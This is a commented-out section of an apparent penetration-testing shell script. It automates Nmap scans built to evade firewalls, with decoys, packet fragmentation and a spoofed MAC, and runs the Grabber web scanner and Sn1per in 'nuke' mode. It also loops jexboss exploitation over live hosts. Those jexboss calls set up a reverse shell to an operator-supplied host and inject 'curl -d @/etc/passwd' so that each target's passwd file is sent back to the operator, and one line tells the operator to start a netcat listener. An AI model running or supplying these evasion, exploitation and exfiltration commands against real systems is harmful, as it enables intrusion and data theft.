



# Nmap - Firewall evasion
# echo
# echo "Firewall evasion scan -- You know just in case ;)"
# nmap -f -mtu 24 --randomize-hosts --reason --resolve-all --spoof-mac Dell -T2 -A -Pn -R -sS -sU -sV --script=vulners -iL $pth/FinalTargets -oA $wrkpth/Nmap/FW_Evade
# nmap -D RND:10 --badsum --data-length 24 --randomize-hosts -reason --resolve-all -T2 -A -Pn -R -sS -sU -sV --script=vulners -iL $pth/FinalTargets-oA $wrkpth/Nmap/FW_Evade2
# xsltproc $wrkpth/Nmap/FW_Evade.xml -o $wrkpth/Nmap/FW_Evade.html
# xsltproc $wrkpth/Nmap/FW_Evade2.xml -o $wrkpth/Nmap/FW_Evade2.html
# echo

# Using Grabber
# for web in $(cat $pth/FinalTargets);do
#     grabber -s -x -b -z -d  SPIDER -j -c -e -u https://$web | tee $wrkpth/Grabber/$prj_name-$web.txt
# done

# # Perform targeted scan using jexboss
# cd /opt/jexboss/
# echo
# echo "This is the part where you turn on netcat (e.g., nc -l -p 443)"
# echo
# echo "What is the reverse host (your machine IP address)?"
# read RHOST
# echo "What is the reverse port (listening port)?"
# read RPORT
# echo
# for IP in $(cat $wrkpth/Nmap/livehosts)
# do
# 	for PORTNUM in ${PORT[*]}
# 	do
# 		STAT1=$(cat $wrkpth/Nmap/$prj_name-nmap_portknock.gnmap | grep $IP | grep "Status: Up" -m 1 -o | cut -c 9-10)
# 		STAT2=$(cat $wrkpth/Nmap/$prj_name-nmap_portknock.gnmap | grep $IP | grep "$PORTNUM/open" -m 1 -o | grep "open" -o)
# 		STAT3=$(cat $wrkpth/Nmap/$prj_name-nmap_portknock.gnmap | grep $IP | grep "$PORTNUM/filtered" -m 1 -o | grep "filtered" -o)
# 		if [ "$STAT1" == "Up" ] && [ "$STAT2" == "open" ] || [ "$STAT3" == "filtered" ];then
# 			if [ "$PORTNUM" == "443" ];then
# 				python jexboss.py -u https://$IP | tee -a "$wrkpth/JexBoss/Logs/$IP-$PORTNUM"
# 			fi
# 			python jexboss.py -u http://$IP:$PORTNUM -A --reverse-host $RHOST:$RPORT -x "curl -d @/etc/passwd $RHOST:$RPORT" | tee -a "$wrkpth/JexBoss/$IP-$PORTNUM"
# 			echo >> $wrkpth/JexBoss/$IP-$PORTNUM
# 			python jexboss.py -u https://$IP:$PORTNUM -A --reverse-host $RHOST:$RPORT -x "curl -d @/etc/passwd $RHOST:$RPORT" | tee -a "$wrkpth/JexBoss/$IP-$PORTNUM"
# 		fi
# 	done
# done
# cp /tmp/jexboss/jexboss_$TodaysYEAR-$TodaysDAY.log $wrkpth/JexBoss/

# # Using sniper
# echo "--------------------------------------------------"
# echo "Performing scan using Sn1per"
# echo "--------------------------------------------------"
# for web in $(cat $pth/FinalTargets);do
#     sniper -w $prj_name -f $wrkpth/FinalTargets -m nuke
# done
# echo